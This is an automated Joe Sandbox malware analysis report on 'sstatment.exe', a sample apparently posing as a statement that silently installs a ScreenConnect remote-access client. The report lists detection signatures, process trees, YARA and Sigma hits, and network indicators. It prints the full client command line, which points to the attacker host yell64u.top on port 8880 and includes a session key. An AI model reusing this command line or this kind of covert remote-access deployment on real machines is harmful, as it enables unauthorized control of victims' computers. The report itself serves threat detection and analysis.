Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sstatment.exe

Overview

General Information

Sample name:sstatment.exe
Analysis ID:1534362
MD5:9aba870d429cb8fa53103ae4b7182af6
SHA1:5f5cea1da1f5238f76a547a1c1fab8b039a190b0
SHA256:9fa76b4ab82376d9486f051b2a7f0e2f584243296f94b2b4b30ea24fae05edd3
Tags:exeuser-malwarology
Infos:

Detection

ScreenConnect Tool
Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • sstatment.exe (PID: 4320 cmdline: "C:\Users\user\Desktop\sstatment.exe" MD5: 9ABA870D429CB8FA53103AE4B7182AF6)
    • msiexec.exe (PID: 3864 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6048 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5012 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 3332 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 732 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7196 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7236 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7308 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7424 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sstatment.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\MSI3407.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Config.Msi\5e3177.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    8.2.ScreenConnect.WindowsClient.exe.2f0fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      0.2.sstatment.exe.54e0000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        8.0.ScreenConnect.WindowsClient.exe.b50000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.2.sstatment.exe.54e0000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.0.sstatment.exe.ac5db8.2.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c=", ProcessId: 7236, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 6048, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.6% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_03C016F8 CryptProtectData,7_2_03C016F8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_03C016F1 CryptProtectData,7_2_03C016F1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_058422E4 CryptUnprotectData,7_2_058422E4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05842FF0 CryptUnprotectData,7_2_05842FF0
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_058422B0 CryptUnprotectData,7_2_058422B0
                              Source: C:\Users\user\Desktop\sstatment.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\sstatment.exeEXE: msiexec.exeJump to behavior
                              Source: sstatment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: sstatment.exeStatic PE information: certificate valid
                              Source: sstatment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: sstatment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: sstatment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: sstatment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800702450.0000000001760000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800903577.00000000017C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: sstatment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1731372444.000000000055D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1715220594.0000000004770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: sstatment.exe, 5e3178.msi.2.dr, MSI3407.tmp.2.dr, 5e3177.rbs.2.dr, 5e3176.msi.2.dr, MSI367A.tmp.2.dr, setup.msi.0.dr, MSI3417.tmp.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: sstatment.exe, 5e3178.msi.2.dr, 5e3176.msi.2.dr, MSI2C46.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: sstatment.exe, ScreenConnect.Windows.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800250212.0000000001722000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2964986924.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: sstatment.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
                              Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: yell64u.top
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmp, sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2953487758.00000000016CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000004.00000003.1709211710.0000000004773000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.0000000004875000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1709027624.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: sstatment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1808670263.0000000013180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
